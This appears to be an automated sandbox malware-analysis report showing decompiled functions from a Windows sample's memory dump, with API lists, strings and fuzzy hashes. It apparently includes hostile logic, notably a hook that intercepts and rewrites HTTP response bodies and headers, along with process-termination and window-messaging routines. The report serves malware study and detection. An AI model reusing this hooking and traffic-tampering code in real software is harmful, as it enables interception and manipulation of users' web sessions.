Instruction ID: 0d711cf439e674a6c9a2a15c0ee43bd82abc1e92628b4f789f370715d01113b5
Opcode Fuzzy Hash: 1e0a588af1f79f3f1d754791a5225ff9b86dddd822111cc8cdc33f7246667bfd
Instruction Fuzzy Hash: 7D310A70700711ABDA309B79BD48F97B3ECAF48740F450829B959E7694DA78E980CA28

Uniqueness

Uniqueness Score: -1.00%

Function 00415F00, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415F00() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t8;
				void* _t11;

				if( *0x42e6e4 != 0) {
					L9:
					 *0x42e6e4 =  *0x42e6e4 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x42e6e0 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x42dd0c = GetProcAddress(_t2, "FCICreate");
						 *0x42e6d0 = GetProcAddress( *0x42e6e0, "FCIAddFile");
						 *0x42d4f4 = GetProcAddress( *0x42e6e0, "FCIFlushCabinet");
						_t8 = GetProcAddress( *0x42e6e0, "FCIDestroy");
						 *0x42e6d8 = _t8;
						if( *0x42dd0c == 0 ||  *0x42e6d0 == 0 ||  *0x42d4f4 == 0 || _t8 == 0) {
							L7:
							FreeLibrary( *0x42e6e0);
							goto L8;
						} else {
							_t11 = HeapCreate(0, 0x80000, 0);
							 *0x42d48c = _t11;
							if(_t11 != 0) {
								goto L9;
							} else {
								goto L7;
							}
						}
					}
				}
			}

0x00415f07
0x00415fb8
0x00415fbd
0x00415fc3
0x00415f0d
0x00415f12
0x00415f18
0x00415f1f
0x00415fb5
0x00415fb7
0x00415f25
0x00415f34
0x00415f52
0x00415f65
0x00415f6a
0x00415f73
0x00415f79
0x00415fa9
0x00415faf
0x00000000
0x00415f91
0x00415f9a
0x00415fa0
0x00415fa7
0x00000000
0x00000000
0x00000000
0x00000000
0x00415fa7
0x00415f79
0x00415f1f

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00415FD8,00000000,004162CF,?,74B5FBB0,00000000,?,?,00000001), ref: 00415F12
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00415F32
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00415F44
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00415F57
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00415F6A
HeapCreate.KERNEL32(00000000,00080000,00000000,00000001), ref: 00415F9A
FreeLibrary.KERNEL32(?,00000001), ref: 00415FAF

Strings

FCIAddFile, xrefs: 00415F3E
cabinet.dll, xrefs: 00415F0D
FCICreate, xrefs: 00415F2C
FCIDestroy, xrefs: 00415F5F
FCIFlushCabinet, xrefs: 00415F4C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: d635518e55d38f2e5ad6069112ad394e6a3100a4da3ab5a04705acaa88210e9d
Instruction ID: e2e7db5cc811f41f7dbc1020ae0048234ba2f30944974b276dadf27b8bbf6baf
Opcode Fuzzy Hash: d635518e55d38f2e5ad6069112ad394e6a3100a4da3ab5a04705acaa88210e9d
Instruction Fuzzy Hash: 2B110A70B41700EBD7609F6AAD08B963BA8A798741FD4043BB404E32F0D7B89542CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C0F0, Relevance: 19.6, APIs: 13, Instructions: 141
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041C0F0(struct HWND__* __eax, void* __edi, void* __eflags) {
				void* __esi;
				intOrPtr _t46;
				void* _t66;
				char _t67;
				signed char _t76;
				void* _t97;
				struct HWND__* _t98;
				RECT* _t100;
				void* _t101;

				_t97 = __edi;
				_t100 =  *(_t101 + 0x94);
				_t98 = __eax;
				_t76 = E004260D0(__eax) & 0x0000ffff;
				if((_t76 & 0x00000001) != 0) {
					L18:
					return 1;
				} else {
					if(GetWindowThreadProcessId(_t98, _t101 + 0x14) == 0) {
						 *((char*)(_t101 + 0x13)) = 0;
						goto L9;
					} else {
						E00416E10(__edi + 0x3c, __edi + 0x50,  *(_t101 + 0x14), _t101 + 0x2c, 2);
						_t66 = OpenMutexW(0x100000, 0, _t101 + 0x28);
						if(_t66 == 0) {
							_t67 = 0;
						} else {
							CloseHandle(_t66);
							_t67 = 1;
						}
						 *((char*)(_t101 + 0x13)) = _t67;
						if(_t67 == 0 || (_t76 & 0x00000010) != 0) {
							L9:
							_push(_t97);
							if(E0041BEB0() == 0) {
								L16:
								_t46 =  *((intOrPtr*)(_t101 + 0x9c));
								if(( *(_t46 + 0x24) & 0x40000000) == 0) {
									IntersectRect(_t101 + 0x20, _t46 + 4, _t100);
									FillRect( *(_t97 + 0x154), _t101 + 0x1c, 6);
									DrawEdge( *(_t97 + 0x154), _t101 + 0x20, 0xa, 0xf);
								}
								goto L18;
							} else {
								E00410820( *((intOrPtr*)(_t97 + 0x10)) + 0x114, _t100, 0x10);
								ResetEvent( *(_t97 + 0xc));
								if(PostThreadMessageW( *(_t97 + 0x188),  *(_t97 + 8), 0xfffffffc, _t98) == 0) {
									goto L16;
								} else {
									if(WaitForSingleObject( *(_t97 + 0xc), 0x3e8) != 0) {
										TerminateProcess( *(_t97 + 0x17c), 0);
										E00412DF0(_t97 + 0x17c);
										goto L16;
									} else {
										if( *((char*)( *((intOrPtr*)(_t97 + 0x10)) + 0x124)) != 1) {
											goto L16;
										} else {
											return  *((intOrPtr*)(_t101 + 0x13));
										}
									}
								}
							}
						} else {
							ResetEvent( *(_t97 + 0xc));
							if(PostMessageW(_t98,  *(_t97 + 8), (_t100->top & 0x0000ffff) << 0x00000010 | _t100->left & 0x0000ffff, (_t100->bottom & 0x0000ffff) << 0x00000010 | _t100->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t97 + 0xc), 0x64) != 0) {
								goto L9;
							} else {
								goto L18;
							}
						}
					}
				}
			}

0x0041c0f0
0x0041c0f8
0x0041c100
0x0041c109
0x0041c10f
0x0041c299
0x0041c2a2
0x0041c115
0x0041c123
0x0041c22c
0x00000000
0x0041c129
0x0041c13e
0x0041c14f
0x0041c157
0x0041c164
0x0041c159
0x0041c15a
0x0041c160
0x0041c160
0x0041c166
0x0041c16c
0x0041c1bc
0x0041c1bc
0x0041c1c4
0x0041c24d
0x0041c24d
0x0041c25b
0x0041c267
0x0041c27b
0x0041c291
0x0041c291
0x00000000
0x0041c1ca
0x0041c1d6
0x0041c1df
0x0041c1fb
0x00000000
0x0041c1fd
0x0041c20e
0x0041c242
0x0041c248
0x00000000
0x0041c210
0x0041c21a
0x00000000
0x0041c21c
0x0041c229
0x0041c229
0x0041c21a
0x0041c20e
0x0041c1fb
0x0041c173
0x0041c177
0x0041c1a6
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c1a6
0x0041c16c
0x0041c123

APIs

Part of subcall function 004260D0: GetClassNameW.USER32 ref: 004260E5

GetWindowThreadProcessId.USER32(?,?), ref: 0041C11B
OpenMutexW.KERNEL32(00100000,00000000,?,?,?,00000002,?,?,?,?,77426AF0), ref: 0041C14F
CloseHandle.KERNEL32(00000000,?,?,?,?,77426AF0), ref: 0041C15A
ResetEvent.KERNEL32(?,?,?,?,?,77426AF0), ref: 0041C177
PostMessageW.USER32(?,?,?,?), ref: 0041C19E
WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,77426AF0), ref: 0041C1AE
ResetEvent.KERNEL32(?,?,?,00000010,?,?,?,?,?,77426AF0), ref: 0041C1DF
PostThreadMessageW.USER32 ref: 0041C1F3
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,?,?,?,77426AF0), ref: 0041C206

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,77426AF0), ref: 0041C242
IntersectRect.USER32 ref: 0041C267
FillRect.USER32 ref: 0041C27B
DrawEdge.USER32(?,0000000A,0000000A,0000000F), ref: 0041C291

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: EventMessageObjectPostProcessRectResetSingleThreadWait$ClassCloseDrawEdgeFillFromHandleIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 689169473-0
Opcode ID: 7273f22ca432eab4713fdf8a0108b0570573b646dcc6f5a05b4300d7e148cd11
Instruction ID: fa2801edb8c9e1c149402c2c032ec4754aff4b841967bafeaeee0fb329cd0e78
Opcode Fuzzy Hash: 7273f22ca432eab4713fdf8a0108b0570573b646dcc6f5a05b4300d7e148cd11
Instruction Fuzzy Hash: 2341DD31640301BBE310DFA4DD84FF7B7A8FB48700F008619F95496291DB78E995CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004275A0, Relevance: 18.2, APIs: 12, Instructions: 248
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E004275A0(signed short __eax, void* __edx) {
				void* __esi;
				long _t53;
				signed short _t61;
				struct HWND__* _t66;
				struct HWND__* _t67;
				intOrPtr _t71;
				signed short _t81;
				int _t82;
				void* _t83;
				int _t84;
				int _t85;
				void* _t86;

				_t81 = __eax;
				_t66 = _t67;
				_t83 = __edx;
				if(__eax == 0x201 || __eax == 0x207 || __eax == 0x204) {
					_t84 = GetAncestor(_t66, 2);
					if(_t84 ==  *(_t83 + 0x170)) {
						goto L8;
					} else {
						if(SendMessageTimeoutW(_t66, 0x21, _t84, (_t81 & 0x0000ffff) << 0x00000010 |  *(_t86 + 0x1c) & 0x0000ffff, 2, 0x64, _t86 + 0x10) == 0) {
							L7:
							 *(_t83 + 0x170) = _t84;
							goto L8;
						} else {
							_t53 =  *(_t86 + 0x10);
							if(_t53 == 2 || _t53 == 4) {
								goto L30;
							} else {
								goto L7;
							}
						}
					}
				} else {
					L8:
					_t85 =  *(_t86 + 0x1c) & 0x0000ffff;
					PostMessageW(_t66, 0x20, _t66, (_t81 & 0x0000ffff) << 0x00000010 | _t85);
					if( *(_t86 + 0x1c) != 1) {
						_t82 = E004274B0(_t83, _t66,  *((intOrPtr*)(_t86 + 0x20)));
						_t26 = _t85 - 2; // -2
						_t53 = _t26;
						if(_t53 > 0x13) {
							L47:
							return PostMessageW(_t66, _t82, _t85,  *(_t86 + 0x28));
						} else {
							_t27 = _t53 + 0x42789c; // 0x1000042
							switch( *((intOrPtr*)(( *_t27 & 0x000000ff) * 4 +  &M00427874))) {
								case 0:
									if(__edi == 0xa3) {
										goto L47;
									} else {
										if(__edi == 0xa5) {
											goto L35;
										} else {
											goto L54;
										}
									}
									goto L56;
								case 1:
									if(_t82 == 0xa3) {
										goto L37;
									}
									if(_t82 == 0xa5) {
										goto L35;
									} else {
										if(_t82 != 0xa1) {
											goto L30;
										} else {
											return PostMessageW(_t66, 0x7b, _t66,  *(_t86 + 0x28));
										}
									}
									goto L56;
								case 2:
									if(__edi != 0xa1) {
										if(__edi != 0xa0) {
											goto L30;
										} else {
											__edx =  *(__esi + 8);
											return PostMessageW(__ebx,  *(__esi + 8), 0xfffffffe, 0);
										}
									} else {
										return PostMessageW(__ebx,  *(__esi + 8), 0xffffffff, 0);
									}
									goto L56;
								case 3:
									if(__edi == 0xa1) {
										GetWindowThreadProcessId(__ebx, 0) = E004272D0(__ebx, __esi, __eax, 0, 1);
										goto L47;
									} else {
										if(__edi == 0xa2 || __edi == 0xa3 || __edi == 0xa0) {
											goto L47;
										} else {
											goto L44;
										}
									}
									goto L56;
								case 4:
									if(__edi != 0xa2) {
										goto L44;
									} else {
										__edx =  *(__esp + 0x18);
										if(( *( *(__esp + 0x18) + 0x24) & 0x00020000) != 0) {
											__eax = 0xf020;
											goto L29;
										}
										goto L30;
									}
									goto L56;
								case 5:
									if(__edi != 0xa2) {
										goto L44;
									} else {
										__eax =  *(__esp + 0x18);
										__eax =  *( *(__esp + 0x18) + 0x24);
										if((__eax & 0x00010000) == 0) {
											goto L30;
										} else {
											__eax = __eax & 0x01000000;
											__eax =  ~__eax;
											asm("sbb eax, eax");
											__eax = __ax & 0x0000ffff;
											if(__ax == 0) {
												goto L30;
											} else {
												__edx = 0xffff;
												if(__ax != __dx) {
													goto L29;
												}
												goto L35;
											}
										}
									}
									goto L56;
								case 6:
									L54:
									if(__edi != 0xa1) {
										goto L30;
									} else {
										 *((intOrPtr*)(__esp + 0x1c)) = GetWindowThreadProcessId(__ebx, 0);
										return __eax;
									}
									goto L56;
								case 7:
									if(__edi == 0xa2) {
										L37:
										goto L29;
									}
									goto L44;
								case 8:
									if(__edi == 0xa2) {
										__eax = 0xf180;
										L29:
										return PostMessageW(_t66, 0x112, 0xf060,  *(_t86 + 0x28));
									}
									L44:
									if(__edi != 0xa5) {
										L30:
										return _t53;
									} else {
										L35:
										return PostMessageW(_t66, 0x7b, _t66,  *(_t86 + 0x28));
									}
									goto L56;
								case 9:
									goto L47;
							}
						}
					} else {
						_t71 =  *((intOrPtr*)(_t83 + 0x10));
						_t61 = 0;
						if(( *(_t71 + 1) & 0x00000080) != 0) {
							_t61 = 1;
						}
						if(( *(_t71 + 2) & 0x00000080) != 0) {
							_t61 = _t61 | 0x00000002;
						}
						if(( *(_t71 + 4) & 0x00000080) != 0) {
							_t61 = _t61 | 0x00000010;
						}
						if(( *(_t71 + 0x10) & 0x00000080) != 0) {
							_t61 = _t61 | 0x00000004;
						}
						if(( *(_t71 + 0x11) & 0x00000080) != 0) {
							_t61 = _t61 | 0x00000008;
						}
						return PostMessageW(_t66, E004274B0(_t83, _t66, _t81), _t61 & 0x0000ffff,  *(_t86 + 0x24));
					}
				}
				L56:
			}

0x004275a5
0x004275a7
0x004275a9
0x004275b1
0x004275cc
0x004275d4
0x00000000
0x004275d6
0x004275f9
0x00427611
0x00427611
0x00000000
0x004275fb
0x004275fb
0x00427602
0x00000000
0x00000000
0x00000000
0x00000000
0x00427602
0x004275f9
0x00427617
0x00427617
0x00427617
0x00427629
0x00427635
0x00427693
0x00427695
0x00427695
0x0042769b
0x004277dc
0x004277ef
0x004276a1
0x004276a1
0x004276a8
0x00000000
0x0042783a
0x00000000
0x0042783c
0x00427842
0x00000000
0x00000000
0x00000000
0x00000000
0x00427842
0x00000000
0x00000000
0x004276b5
0x00000000
0x00000000
0x004276c1
0x00000000
0x004276c7
0x004276cd
0x00000000
0x004276cf
0x004276e3
0x004276e3
0x004276cd
0x00000000
0x00000000
0x004277f8
0x00427817
0x00000000
0x0042781d
0x0042781d
0x00427831
0x00427831
0x004277fa
0x0042780e
0x0042780e
0x00000000
0x00000000
0x004277a1
0x004277d7
0x00000000
0x004277a3
0x004277a9
0x00000000
0x00000000
0x00000000
0x00000000
0x004277a9
0x00000000
0x00000000
0x004276ec
0x00000000
0x004276f2
0x004276f2
0x004276fd
0x004276ff
0x00000000
0x004276ff
0x00000000
0x004276fd
0x00000000
0x00000000
0x00427727
0x00000000
0x0042772d
0x0042772d
0x00427731
0x00427739
0x00000000
0x0042773b
0x0042773b
0x00427740
0x00427742
0x0042774e
0x00427754
0x00000000
0x00427756
0x00427756
0x0042775e
0x00000000
0x00000000
0x00000000
0x0042775e
0x00427754
0x00427739
0x00000000
0x00000000
0x00427848
0x0042784e
0x00000000
0x00427854
0x0042785e
0x0042786f
0x0042786f
0x00000000
0x00000000
0x0042777d
0x0042777f
0x00000000
0x0042777f
0x00000000
0x00000000
0x0042778f
0x00427791
0x00427704
0x00000000
0x00427713
0x004277bb
0x004277c1
0x0042771e
0x0042771e
0x004277c7
0x00427760
0x00427774
0x00427774
0x00000000
0x00000000
0x00000000
0x00000000
0x004276a8
0x00427637
0x00427637
0x0042763c
0x00427641
0x00427643
0x00427643
0x0042764b
0x0042764d
0x0042764d
0x00427653
0x00427655
0x00427655
0x0042765b
0x0042765d
0x0042765d
0x00427663
0x00427665
0x00427665
0x00427685
0x00427685
0x00427635
0x00000000

APIs

GetAncestor.USER32(00000000,00000002,00000000,?,?,?,00000000,00427C53,?,00000001,000000A0,?,?), ref: 004275C6
SendMessageTimeoutW.USER32 ref: 004275F1
PostMessageW.USER32(00000000,00000020,00000000,00000000), ref: 00427629
PostMessageW.USER32(00000000,00000000,00000000,00000200), ref: 0042767A
PostMessageW.USER32(?,0000007B,?,?), ref: 004276D8
PostMessageW.USER32(?,00000112,?,?), ref: 00427713
PostMessageW.USER32(00000000,0000007B,00000000,?), ref: 00427769
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004277D0
PostMessageW.USER32(00000000,00000000,00000000,?), ref: 004277E4
PostMessageW.USER32(?,00000001,000000FF,00000000), ref: 00427803
PostMessageW.USER32(?,00000001,000000FE,00000000), ref: 00427826
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042785E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Post$ProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 3834953286-0
Opcode ID: abf779a467d26b525d9c6532bf36921afdf200465abdec2c904ff8246aff3145
Instruction ID: 8710c53efe13d224ec08304d0220b31d61ed04be28d7cc6a3b8f8faba3e79ed2
Opcode Fuzzy Hash: abf779a467d26b525d9c6532bf36921afdf200465abdec2c904ff8246aff3145
Instruction Fuzzy Hash: 676102727083245AE624862DFC88FBB6759D7C1365F944A2BF542872E2C67EE8418339

Uniqueness

Uniqueness Score: -1.00%

Function 004085A0, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 280
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004085A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v20;
				void* _v28;
				signed char _v32;
				char _v40;
				intOrPtr _v44;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				void* _v76;
				void* _v80;
				void* _v84;
				void* __edi;
				void* __esi;
				long _t95;
				signed int _t98;
				intOrPtr _t132;
				void* _t142;
				void* _t153;
				signed int _t156;
				signed int _t158;
				intOrPtr _t161;
				intOrPtr _t177;
				intOrPtr _t191;
				intOrPtr _t193;
				intOrPtr* _t195;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t202;
				void* _t205;
				void* _t206;
				signed int _t209;
				void* _t210;
				intOrPtr _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				signed int _t216;
				void* _t218;
				void* _t220;
				intOrPtr _t233;

				_t218 = (_t216 & 0xfffffff8) - 0x2c;
				_t95 = WaitForSingleObject( *0x42edbc, 0);
				_t202 = _a4;
				_t193 = _a12;
				if(_t95 == 0 || _a8 == 0 || _t193 <= 0) {
					L39:
					return  *0x42d3e8(_t202, _a8, _t193);
				} else {
					EnterCriticalSection(0x42d3c4);
					_t98 = E00407350(_t202);
					if(_t98 == 0xffffffff) {
						L38:
						LeaveCriticalSection(0x42d3c4);
						goto L39;
					} else {
						_t177 =  *0x42d3e0; // 0x0
						_t158 = _t98 * 8 - _t98;
						_t153 = _t177 + _t158 * 8;
						if( *((intOrPtr*)(_t177 + 0x30 + _t158 * 8)) > 0) {
							L31:
							_t205 =  *(_t153 + 0x30) -  *((intOrPtr*)(_t153 + 0x34));
							__eflags = _t193 - _t205;
							_t206 =  <  ? _t193 : _t205;
							_t86 = _t153 + 0x2c; // 0x2c
							_t195 = _t86;
							E00410820(_a8,  *((intOrPtr*)(_t153 + 0x2c)) +  *((intOrPtr*)(_t153 + 0x34)), _t206);
							 *((intOrPtr*)(_t153 + 0x34)) =  *((intOrPtr*)(_t153 + 0x34)) + _t206;
							__eflags =  *((intOrPtr*)(_t153 + 0x34)) -  *(_t153 + 0x30);
							if( *((intOrPtr*)(_t153 + 0x34)) ==  *(_t153 + 0x30)) {
								E00410870(E004107C0( *_t195), _t195, 0, 0xc);
							}
							LeaveCriticalSection(0x42d3c4);
							return _t206;
						} else {
							if( *((intOrPtr*)(_t153 + 0x10)) <= 0) {
								goto L38;
							} else {
								LeaveCriticalSection(0x42d3c4);
								_t197 =  *0x42d3e8(_t202, _a8, _t193);
								_t220 = _t218 + 0xc;
								_v44 = _t197;
								if(_t197 <= 0xffffffff) {
									L37:
									return _t197;
								} else {
									EnterCriticalSection(0x42d3c4);
									_t156 = E00407350(_t202);
									if(_t156 == 0xffffffff) {
										L34:
										_push(8);
										_push(0xffffe890);
										goto L35;
									} else {
										if(_t197 == 0) {
											L10:
											_t161 =  *0x42d3e0; // 0x0
											_t153 = _t161 + (_t156 * 8 - _t156) * 8;
											if(_t197 > 0) {
												E00410820( *((intOrPtr*)(_t153 + 0x14)) +  *(_t153 + 0x18), _a8, _t197);
												_t24 = _t153 + 0x18;
												 *_t24 =  *(_t153 + 0x18) + _t197;
												_t233 =  *_t24;
											}
											_t209 = E00408050(_t233,  &_v20,  *((intOrPtr*)(_t153 + 0x14)),  *(_t153 + 0x18));
											if(_t209 == 1) {
												_t209 = E004082D0( *(_t153 + 0x18),  &_v20,  *((intOrPtr*)(_t153 + 0x14)), (_t113 & 0xffffff00 | _t197 == 0x00000000) & 0x000000ff,  &_v40,  &_v48);
												if(_t209 == 1) {
													if(E00425560( *((intOrPtr*)(_t153 + 4)),  &_v40,  &_v48,  *((intOrPtr*)(_t153 + 0xc)),  *((intOrPtr*)(_t153 + 0x10))) != 0) {
														_t209 =  *(_t220 + 0x30);
														_t199 = E004107A0( *(_t153 + 0x18) -  *((intOrPtr*)(_t220 + 0x34)) + _t209 + _v48 + 0x14);
														 *((intOrPtr*)(_t220 + 0x18)) = _t199;
														if(_t199 != 0) {
															E00410820(_t199,  *((intOrPtr*)(_t153 + 0x14)), _t209);
															_t132 = _v60;
															if((_v32 & 0x00000002) == 0) {
																E00411200(_t132,  &_v32);
																_t210 = _t199 + E00417BB0(_t199, _t209, "Content-Length",  &_v32);
																_t211 = _t210 + E00410820(_t210, _v56, _v64);
																__eflags = _t211;
															} else {
																_push(_t132);
																_t212 = _t209 + _t199;
																_t142 = E00411D70(_t132, 0xd, _t212, "%x\r\n");
																_t220 = _t220 + 8;
																_t213 = _t212 + _t142;
																_t214 = _t213 + E00410820(_t213, _v40, _v48);
																E00410820(_t214, "\r\n0\r\n\r\n", 7);
																_t199 = _v60;
																_t211 = _t214 + 7;
															}
															_t137 =  *(_t153 + 0x18);
															_t171 =  *((intOrPtr*)(_t220 + 0x34));
															if( *((intOrPtr*)(_t220 + 0x34)) !=  *(_t153 + 0x18)) {
																_t211 = _t211 + E00410820(_t211,  *((intOrPtr*)(_t153 + 0x14)) + _t171, _t137 - _t171);
															}
															E004107C0( *((intOrPtr*)(_t153 + 0x14)));
															_t209 = _t211 - _t199;
															 *((intOrPtr*)(_t153 + 0x14)) = _t199;
															 *(_t153 + 0x18) = _t209;
														}
														_t197 = _v44;
													}
													_t209 = _t209 | 0xffffffff;
													E004107C0(_v40);
												}
											}
											if(_t197 <= 0) {
												L28:
												if(__eflags == 0) {
													L30:
													 *((intOrPtr*)(_t153 + 0x34)) = 0;
													 *((intOrPtr*)(_t153 + 0x14)) = 0;
													 *(_t153 + 0x18) = 0;
													 *((intOrPtr*)(_t153 + 0x2c)) =  *((intOrPtr*)(_t153 + 0x14));
													 *(_t153 + 0x30) =  *(_t153 + 0x18);
													E00425CF0( *((intOrPtr*)(_t153 + 0x10)),  *((intOrPtr*)(_t153 + 0xc)));
													_t193 = _a12;
													__eflags = 0;
													 *((intOrPtr*)(_t153 + 0x10)) = 0;
													 *((intOrPtr*)(_t153 + 0xc)) = 0;
													goto L31;
												} else {
													__eflags = _t209 - 0xffffffff;
													if(_t209 != 0xffffffff) {
														goto L36;
													} else {
														goto L30;
													}
												}
											} else {
												if(_t209 != 0) {
													__eflags = _t197;
													goto L28;
												} else {
													_push(0);
													_push(0xffffe892);
													L35:
													 *0x42d3c0();
													_v44 = 0xffffffff;
													_t197 = _v44;
													L36:
													LeaveCriticalSection(0x42d3c4);
													goto L37;
												}
											}
										} else {
											_t191 =  *0x42d3e0; // 0x0
											_t17 = _t191 + (_t156 * 8 - _t156) * 8 + 0x14; // 0x14
											if(E00410740( *((intOrPtr*)(_t191 + (_t156 * 8 - _t156) * 8 + 0x18)) + _t197, _t17) == 0) {
												goto L34;
											} else {
												goto L10;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x004085ab
0x004085b4
0x004085ba
0x004085bd
0x004085c2
0x004088e2
0x004088f7
0x004085da
0x004085df
0x004085e5
0x004085ed
0x004088d7
0x004088dc
0x00000000
0x004085f3
0x004085f3
0x00408600
0x00408607
0x0040860a
0x00408858
0x0040885b
0x00408864
0x00408866
0x0040886c
0x0040886c
0x00408872
0x00408877
0x0040887d
0x00408880
0x0040888e
0x0040888e
0x00408898
0x004088a6
0x00408610
0x00408614
0x00000000
0x0040861a
0x0040861f
0x00408631
0x00408633
0x00408636
0x0040863d
0x004088ce
0x004088d6
0x00408643
0x00408648
0x00408653
0x00408658
0x004088a7
0x004088a7
0x004088a9
0x00000000
0x0040865e
0x00408660
0x00408689
0x00408689
0x00408698
0x0040869d
0x004086ab
0x004086b0
0x004086b0
0x004086b0
0x004086b0
0x004086c5
0x004086ca
0x004086f4
0x004086f9
0x0040871c
0x00408729
0x0040873c
0x0040873e
0x00408744
0x00408750
0x0040875a
0x0040875e
0x004087a3
0x004087bd
0x004087cc
0x004087cc
0x00408760
0x00408760
0x00408761
0x0040876d
0x00408776
0x00408779
0x0040878e
0x00408791
0x00408796
0x0040879a
0x0040879a
0x004087ce
0x004087d1
0x004087d7
0x004087e8
0x004087e8
0x004087ed
0x004087f2
0x004087f4
0x004087f7
0x004087f7
0x004087fa
0x004087fa
0x00408802
0x00408805
0x00408805
0x004086f9
0x0040880e
0x00408821
0x00408821
0x0040882c
0x00408832
0x00408835
0x00408838
0x00408842
0x00408845
0x00408848
0x0040884d
0x00408850
0x00408852
0x00408855
0x00000000
0x00408823
0x00408823
0x00408826
0x00000000
0x00000000
0x00000000
0x00000000
0x00408826
0x00408810
0x00408812
0x0040881f
0x00000000
0x00408814
0x00408814
0x00408815
0x004088ae
0x004088ae
0x004088b4
0x004088bc
0x004088c3
0x004088c8
0x00000000
0x004088c8
0x00408812
0x00408662
0x00408662
0x00408679
0x00408683
0x00000000
0x00000000
0x00000000
0x00000000
0x00408683
0x00408660
0x00408658
0x0040863d
0x00408614
0x0040860a
0x004085ed

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 004085B4
EnterCriticalSection.KERNEL32(0042D3C4), ref: 004085DF
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 0040861F
EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408648
LeaveCriticalSection.KERNEL32(0042D3C4,00000000,?,?), ref: 00408898
LeaveCriticalSection.KERNEL32(0042D3C4), ref: 004088C8

Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752

Part of subcall function 00417BB0: StrCmpNIA.SHLWAPI(?,?,00000000,00000000,00000000,?,?,?,?,?), ref: 00417C52
Part of subcall function 00417BB0: HeapAlloc.KERNEL32(?,00000000,?,?,?,?,?), ref: 00417C7C

Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD

LeaveCriticalSection.KERNEL32(0042D3C4), ref: 004088DC

Strings

%x, xrefs: 00408763
0, xrefs: 00408789
Content-Length, xrefs: 004087AD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Heap$EnterFree$AllocObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4226758563-3838797520
Opcode ID: bc8b9fe48aee8be7ae272fbd96448250cb6d68f05f5c38309599c8d6f13eb58b
Instruction ID: 7187d8172827c6b86885b265f03b8039d5178bea7c058573e981ff8388779b29
Opcode Fuzzy Hash: bc8b9fe48aee8be7ae272fbd96448250cb6d68f05f5c38309599c8d6f13eb58b
Instruction Fuzzy Hash: 51A1C472A002009FCB14EF28D985E6B77A5EF84314F10466EFC54AB296DB34EC55CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 0042789F, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 262
synchronizationwindowthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

